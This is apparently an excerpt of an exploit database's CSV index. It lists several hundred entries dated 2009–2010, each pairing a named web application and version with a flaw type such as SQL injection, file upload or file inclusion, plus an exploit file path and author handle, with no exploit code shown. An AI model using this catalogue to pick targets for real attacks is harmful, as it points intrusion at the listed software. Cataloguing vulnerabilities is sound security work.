+10756,exploits/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Arbitrary File Upload",2009-12-28,FormatXformat,webapps,linux,80 +10757,exploits/linux/webapps/10757.txt,"PHP Forum ohne My SQL - Arbitrary File Upload",2009-12-28,"wlhaan hacker",webapps,linux,80 +10758,exploits/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,webapps,php, +10760,exploits/php/webapps/10760.txt,"Joomla! Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,webapps,php, +10762,exploits/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",webapps,php, +10763,exploits/php/webapps/10763.txt,"Dren's PHP Uploader - Arbitrary File Upload",2009-12-28,"Cyb3r IntRue",webapps,php, +10767,exploits/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10770,exploits/asp/webapps/10770.txt,"PSnews - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10771,exploits/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download",2009-12-29,indoushka,webapps,asp, +10772,exploits/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Disclosure",2009-12-29,indoushka,webapps,asp, +10773,exploits/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10774,exploits/asp/webapps/10774.txt,"htmlArea 2.03 - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10775,exploits/asp/webapps/10775.txt,"Uguestbook - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10776,exploits/asp/webapps/10776.txt,"BaalASP 2.0 - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10777,exploits/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10778,exploits/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10779,exploits/php/webapps/10779.txt,"DirectAdmin 1.34.0 - Cross-Site Request Forgery (Add Admin)",2009-12-29,SecurityRules,webapps,php, +10780,exploits/asp/webapps/10780.txt,"ASP Battle Blog - Database Disclosure",2009-12-29,indoushka,webapps,asp, +10781,exploits/php/webapps/10781.txt,"ActiveKB - Remote File Inclusion",2009-12-29,indoushka,webapps,php, +10784,exploits/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection",2009-12-29,R3VAN_BASTARD,webapps,php, +10788,exploits/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,webapps,php, +10789,exploits/php/webapps/10789.txt,"Joomla! Component com_noticia - Cross-Site Scripting",2009-12-29,Mr.tro0oqy,webapps,php, +10790,exploits/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,webapps,php, +10792,exploits/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,webapps,hardware,80 +10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php, +10794,exploits/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,webapps,asp, +10795,exploits/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,webapps,asp, +10796,exploits/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,webapps,asp, +10798,exploits/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,webapps,php, +10800,exploits/php/webapps/10800.txt,"I-RATER Basic - Arbitrary File Upload",2009-12-30,indoushka,webapps,php, +10802,exploits/php/webapps/10802.txt,"PicMe 2.1.0 - Arbitrary File Upload",2009-12-30,indoushka,webapps,php, +10803,exploits/php/webapps/10803.txt,"UBBCentral UBB.Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,webapps,php, +10805,exploits/php/webapps/10805.txt,"Diesel Job Site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,webapps,php, +10806,exploits/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,webapps,php, +10807,exploits/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,webapps,php, +10808,exploits/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,webapps,php, +10809,exploits/php/webapps/10809.txt,"I-Escorts Directory - 'country_escorts.php?country_id' SQL Injection",2009-12-30,R3d-D3V!L,webapps,php, +10810,exploits/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,webapps,php, +10811,exploits/php/webapps/10811.txt,"Joomla! Component com_intuit - Apache Directory listing Download",2009-12-30,indoushka,webapps,php, +10812,exploits/php/webapps/10812.txt,"WHOISCART - Scripting",2009-12-30,HAQIQ20,webapps,php, +10813,exploits/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross-Site Scripting",2009-12-30,indoushka,webapps,php, +10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,webapps,php, +10817,exploits/php/webapps/10817.txt,"Joomla! Component com_airmonoblock - Blind SQL Injection",2009-12-30,Pyske,webapps,php, +10819,exploits/asp/webapps/10819.txt,"gallery_show.asp - GID Blind SQL Injection",2009-12-30,R3d-D3V!L,webapps,asp, +10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,webapps,multiple, +10822,exploits/php/webapps/10822.txt,"Joomla! Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,webapps,php, +10823,exploits/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,webapps,asp, +10824,exploits/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,webapps,php, +10828,exploits/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",webapps,php, +10830,exploits/php/webapps/10830.txt,"Azadi Network - 'page' SQL Injection",2009-12-30,"Hussin X",webapps,php, +10831,exploits/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",webapps,php, +10832,exploits/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",webapps,php, +10833,exploits/php/webapps/10833.txt,"Classifieds Script - 'type' SQL Injection",2009-12-30,"Hussin X",webapps,php, +10835,exploits/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access",2009-12-30,Sora,webapps,php, +10836,exploits/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",webapps,php, +10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10838,exploits/php/webapps/10838.txt,"list Web - 'addlink.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10839,exploits/php/webapps/10839.txt,"Classified Ads Scrip - 'store_info.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10841,exploits/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion",2009-12-31,cr4wl3r,webapps,php, +10844,exploits/php/webapps/10844.txt,"Joomla! Component com_portfol - SQL Injection",2009-12-31,"wlhaan hacker",webapps,php, +10845,exploits/php/webapps/10845.txt,"fileNice PHP file browser - Local/Remote File Inclusion",2009-12-31,e.wiZz,webapps,php, +10846,exploits/php/webapps/10846.txt,"Weatimages - Directory Traversal / Local File Inclusion",2009-12-31,e.wiZz,webapps,php, +10847,exploits/php/webapps/10847.txt,"Joomla! Component com_mdigg - SQL Injection",2009-12-31,"wlhaan hacker",webapps,php, +10850,exploits/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,webapps,php, +10861,exploits/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,webapps,php, +10869,exploits/php/webapps/10869.txt,"PhotoDiary 1.3 - 'lng' Local File Inclusion",2009-12-31,cOndemned,webapps,php, +10871,exploits/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",webapps,php, +10872,exploits/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10873,exploits/php/webapps/10873.txt,"EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",webapps,php, +10874,exploits/php/webapps/10874.txt,"Pre News Manager - 'nid' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10876,exploits/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",webapps,php, +10877,exploits/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",webapps,php, +10878,exploits/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,webapps,php, +10880,exploits/php/webapps/10880.php,"bbScript 1.1.2.1 - 'id' Blind SQL Injection",2009-12-31,cOndemned,webapps,php, +10882,exploits/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-31,"D3V!L FUCKER",webapps,php, +10883,exploits/asp/webapps/10883.txt,"BlogWorx 1.0 Blog - Database Disclosure",2010-01-01,LionTurk,webapps,asp, +10884,exploits/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 - 'blogs.php?Id' SQL Injection",2010-01-01,BAYBORA,webapps,asp, +10885,exploits/php/webapps/10885.txt,"Cype CMS - SQL Injection",2010-01-01,Sora,webapps,php, +10889,exploits/php/webapps/10889.txt,"DS CMS 1.0 - 'NewsId' SQL Injection",2010-01-01,Palyo34,webapps,php, +10891,exploits/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,webapps,php, +10897,exploits/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,webapps,php, +10899,exploits/php/webapps/10899.txt,"XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection",2010-01-01,Gamoscu,webapps,php, +10901,exploits/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,webapps,php, +10903,exploits/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,webapps,asp, +10905,exploits/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,webapps,php, +10906,exploits/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,webapps,php, +10910,exploits/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,webapps,php, +10912,exploits/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Insecure Cookie Handling",2010-01-02,DigitALL,webapps,php, +10921,exploits/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",webapps,php, +10923,exploits/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,webapps,php, +10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php, +10928,exploits/php/webapps/10928.txt,"Joomla! Component com_dailymeals - Local File Inclusion",2010-01-02,FL0RiX,webapps,php, +10929,exploits/php/webapps/10929.txt,"WordPress Plugin Events - SQL Injection",2010-01-02,Red-D3v1L,webapps,php, +10930,exploits/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,webapps,php, +10931,exploits/php/webapps/10931.txt,"X7CHAT 1.3.6b - Arbitrary Add Admin",2010-01-02,d4rk-h4ck3r,webapps,php, +10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php, +10940,exploits/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure",2010-01-03,LionTurk,webapps,asp, +10941,exploits/php/webapps/10941.php,"Joomla! Component com_aprice - Blind SQL Injection",2010-01-03,FL0RiX,webapps,php, +10942,exploits/php/webapps/10942.txt,"Joomla! Component com_cartweberp - Local File Inclusion",2010-01-03,FL0RiX,webapps,php, +10943,exploits/php/webapps/10943.txt,"Joomla! Component com_biblestudy - Local File Inclusion",2010-01-03,FL0RiX,webapps,php, +10944,exploits/php/webapps/10944.txt,"Joomla! Component com_bfsurvey_basic - SQL Injection",2010-01-03,FL0RiX,webapps,php, +10945,exploits/php/webapps/10945.php,"Joomla! Component com_bfsurvey_pro - 'catid' Blind SQL Injection",2010-01-03,FL0RiX,webapps,php, +10946,exploits/php/webapps/10946.txt,"Joomla! Component com_bfsurvey - Local File Inclusion",2010-01-03,FL0RiX,webapps,php, +10948,exploits/php/webapps/10948.txt,"Joomla! Component com_abbrev - Local File Inclusion",2010-01-03,FL0RiX,webapps,php, +10949,exploits/php/webapps/10949.txt,"Joomla! Component com_countries - SQL Injection",2010-01-03,FL0RiX,webapps,php, +10950,exploits/php/webapps/10950.txt,"Joomla! Component com_tpjobs - Blind SQL Injection",2010-01-03,FL0RiX,webapps,php, +10952,exploits/php/webapps/10952.txt,"Joomla! Component com_alfresco - SQL Injection",2010-01-03,FL0RiX,webapps,php, +10953,exploits/php/webapps/10953.txt,"Joomla! Component com_hotbrackets - Blind SQL Injection",2010-01-03,FL0RiX,webapps,php, +10955,exploits/asp/webapps/10955.txt,"MasterWeb Script 1.0 - 'details&newsID' SQL Injection",2010-01-03,Red-D3v1L,webapps,asp, +10962,exploits/php/webapps/10962.txt,"Live TV Script - SQL Injection",2010-01-03,R3d-D3V!L,webapps,php, +10964,exploits/php/webapps/10964.txt,"Joomla! Component Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,webapps,php, +10965,exploits/php/webapps/10965.txt,"Joomla! Component com_doqment - 'cid' SQL Injection",2010-01-03,Gamoscu,webapps,php, +10966,exploits/php/webapps/10966.txt,"Joomla! Component com_otzivi - Blind SQL Injection",2010-01-03,Cyber_945,webapps,php, +10967,exploits/php/webapps/10967.txt,"Rezervi 3.0.2 - 'mail.inc.php' Remote File Inclusion",2010-01-03,r00t.h4x0r,webapps,php, +10968,exploits/php/webapps/10968.txt,"portal modulnet 1.0 - 'id' SQL Injection",2010-01-03,Red-D3v1L,webapps,php, +10971,exploits/php/webapps/10971.txt,"Joomla! Component Bamboo Simpla Admin Template - SQL Injection",2010-01-03,R3d-D3V!L,webapps,php, +10972,exploits/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,webapps,asp, +10974,exploits/php/webapps/10974.txt,"Simple Portal 2.0 - Authentication Bypass",2010-01-03,Red-D3v1L,webapps,php, +10976,exploits/php/webapps/10976.txt,"WorldPay Script Shop - 'productdetail' SQL Injection",2010-01-03,Err0R,webapps,php, +10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,webapps,php, +10978,exploits/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,webapps,php, +10979,exploits/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write",2010-01-03,"Ubik & er",webapps,php, +10981,exploits/php/webapps/10981.pl,"Smart Vision Script News - 'newsdetail.php' SQL Injection (2)",2010-01-04,darkmasking,webapps,php, +10983,exploits/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,webapps,php, +10984,exploits/php/webapps/10984.txt,"Joomla! Component com_cartikads 1.0 - Arbitrary File Upload",2010-01-04,kaMtiEz,webapps,php, +10986,exploits/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - Remote File Inclusion",2010-01-04,indoushka,webapps,php, +10988,exploits/php/webapps/10988.txt,"Joomla! Component com_j-projects - Blind SQL Injection",2010-01-04,Pyske,webapps,php, +10991,exploits/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,php, +10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,multiple, +11002,exploits/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,webapps,php, +11003,exploits/php/webapps/11003.txt,"LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion",2010-01-04,"Zer0 Thunder",webapps,php, +11005,exploits/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,webapps,asp, +11008,exploits/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Disclosure",2010-01-05,indoushka,webapps,asp, +11012,exploits/php/webapps/11012.txt,"ITaco Group ITaco.biz - 'view_news' SQL Injection",2010-01-06,Err0R,webapps,php, +11013,exploits/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",webapps,php, +11014,exploits/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,webapps,php, +11015,exploits/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure",2010-01-06,indoushka,webapps,asp, +11016,exploits/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Disclosure",2010-01-06,indoushka,webapps,asp, +11017,exploits/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,webapps,php, +11018,exploits/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Disclosure",2010-01-06,indoushka,webapps,asp, +11019,exploits/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",webapps,php, +11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,webapps,asp, +11024,exploits/php/webapps/11024.txt,"Joomla! Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,webapps,php, +11025,exploits/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,webapps,php, +11026,exploits/php/webapps/11026.php,"com_jembed - 'catid' Blind SQL Injection",2010-01-06,FL0RiX,webapps,php, +11028,exploits/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",webapps,php, +11030,exploits/hardware/webapps/11030.txt,"D-Link DKVM-IP8 - Cross-Site Scripting",2010-01-06,POPCORN,webapps,hardware, +11031,exploits/php/webapps/11031.txt,"Milonic News - 'viewnews' SQL Injection",2010-01-06,Err0R,webapps,php, +11033,exploits/php/webapps/11033.txt,"Joomla! Component com_kk - Blind SQL Injection",2010-01-06,Pyske,webapps,php, +11035,exploits/php/webapps/11035.txt,"Joomla! Component com_king - Blind SQL Injection",2010-01-06,Pyske,webapps,php, +11036,exploits/php/webapps/11036.txt,"Roundcube Webmail - Multiple Vulnerabilities",2010-01-06,"j4ck & Globus",webapps,php, +11045,exploits/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,webapps,php, +11047,exploits/php/webapps/11047.txt,"Zeeways Technology - 'product_desc.php' SQL Injection",2010-01-07,Gamoscu,webapps,php, +11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php, +11051,exploits/php/webapps/11051.txt,"AutoIndex PHP Script - 'index.php' Directory Traversal",2010-01-07,Red-D3v1L,webapps,php, +11057,exploits/php/webapps/11057.txt,"Read Excel Script 1.1 - Arbitrary File Upload",2010-01-07,Yozgat.Us,webapps,php, +11060,exploits/php/webapps/11060.txt,"Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-01-07,emgent,webapps,php,80 +11061,exploits/php/webapps/11061.txt,"Joomla! Component Regional Booking - 'id' Blind SQL Injection",2010-01-07,"Hussin X",webapps,php, +11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php, +11068,exploits/php/webapps/11068.txt,"Joomla! Component com_ksadvertiser - SQL Injection",2010-01-08,FL0RiX,webapps,php, +11069,exploits/php/webapps/11069.txt,"DELTAScripts PHPLinks - 'catid' SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",webapps,php, +11071,exploits/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",webapps,php, +11075,exploits/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local/Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",webapps,php, +11076,exploits/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,webapps,php, +11080,exploits/php/webapps/11080.txt,"ProArcadeScript to Game - SQL Injection",2010-01-10,Err0R,webapps,php, +11081,exploits/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injections",2010-01-10,Cyber_945,webapps,php, +11082,exploits/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,webapps,php, +11083,exploits/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r & Ablus",webapps,php, +11085,exploits/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,webapps,php, +11086,exploits/php/webapps/11086.txt,"Joomla! Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,webapps,php, +11087,exploits/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,webapps,php, +11088,exploits/php/webapps/11088.txt,"Joomla! Component com_jcollection - Directory Traversal",2010-01-10,FL0RiX,webapps,php, +11089,exploits/php/webapps/11089.txt,"Joomla! Component com_jvideodirect - Directory Traversal",2010-01-10,FL0RiX,webapps,php, +11090,exploits/php/webapps/11090.txt,"Joomla! Component com_jashowcase - Directory Traversal",2010-01-10,FL0RiX,webapps,php, +11094,exploits/php/webapps/11094.txt,"Simply Classified 0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-10,mr_me,webapps,php, +11096,exploits/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure",2010-01-10,ViRuSMaN,webapps,asp, +11097,exploits/asp/webapps/11097.txt,"Egreetings 1.0b - Remote Database Disclosure",2010-01-10,ViRuSMaN,webapps,asp, +11098,exploits/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure",2010-01-10,ViRuSMaN,webapps,asp, +11101,exploits/hardware/webapps/11101.txt,"D-Link Routers - Authentication Bypass (2)",2010-01-10,"SourceSec DevTeam",webapps,hardware, +11104,exploits/php/webapps/11104.txt,"CMScontrol 7.x - Arbitrary File Upload",2010-01-11,Cyber_945,webapps,php, +11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,webapps,php, +11110,exploits/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,webapps,php, +11111,exploits/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,webapps,php, +11113,exploits/php/webapps/11113.txt,"tincan ltd - 'section' SQL Injection",2010-01-11,ALTBTA,webapps,php, +11116,exploits/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,webapps,php, +11120,exploits/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,webapps,php, +11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,webapps,php, +11126,exploits/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,webapps,php,80 +11127,exploits/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,webapps,php,80 +11134,exploits/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Disclosure",2010-01-13,indoushka,webapps,asp, +11135,exploits/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",webapps,php, +11136,exploits/php/webapps/11136.txt,"Public Media Manager - SQL Injection",2010-01-13,"learn3r hacker",webapps,php, +11140,exploits/php/webapps/11140.txt,"Joomla! Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,webapps,php, +11141,exploits/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,webapps,php, +11147,exploits/php/webapps/11147.txt,"Max's File Uploader - Arbitrary File Upload",2010-01-15,S2K9,webapps,php, +11148,exploits/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,webapps,php, +11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php, +11156,exploits/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,webapps,php, +11157,exploits/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php, +11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php, +11159,exploits/php/webapps/11159.txt,"DasForum - 'layout' Local File Inclusion",2010-01-16,cr4wl3r,webapps,php, +11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php, +11163,exploits/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php, +11164,exploits/php/webapps/11164.txt,"Ebay Clone from clone2009 - SQL Injection",2010-01-16,"Hamza 'MizoZ' N.",webapps,php, +11166,exploits/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (2)",2010-01-17,Stink',webapps,php, +11168,exploits/php/webapps/11168.txt,"Joomla! Component com_pc - Local File Inclusion",2010-01-17,Pyske,webapps,php, +11169,exploits/php/webapps/11169.txt,"Max's Image Uploader - Arbitrary File Upload",2010-01-17,indoushka,webapps,php, +11177,exploits/php/webapps/11177.txt,"Joomla! Component com_prime - Directory Traversal",2010-01-17,FL0RiX,webapps,php, +11178,exploits/php/webapps/11178.txt,"Joomla! Component com_libros - SQL Injection",2010-01-17,FL0RiX,webapps,php, +11183,exploits/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilities",2010-01-18,"Prashant Khandelwal",webapps,php, +11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple, +11185,exploits/php/webapps/11185.html,"al3jeb script - Remote Change Password",2010-01-18,alnjm33,webapps,php, +11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple, +11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple, +11188,exploits/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,webapps,php, +11189,exploits/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,webapps,php, +11198,exploits/php/webapps/11198.txt,"al3jeb script - Remote Authentication Bypass",2010-01-19,cr4wl3r,webapps,php, +11211,exploits/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,webapps,multiple, +11212,exploits/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,webapps,asp, +11213,exploits/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,webapps,php, +11215,exploits/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",2010-01-21,cp77fk4r,webapps,windows, +11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",2010-01-21,"BorN To K!LL",webapps,php, +11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple, +11222,exploits/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,webapps,php, +11223,exploits/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",2010-01-22,snakespc,webapps,php, +11224,exploits/php/webapps/11224.txt,"KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2010-01-22,"Milos Zivanovic",webapps,php, +11225,exploits/php/webapps/11225.txt,"Joomla! Component com_gurujibook - SQL Injection",2010-01-22,snakespc,webapps,php, 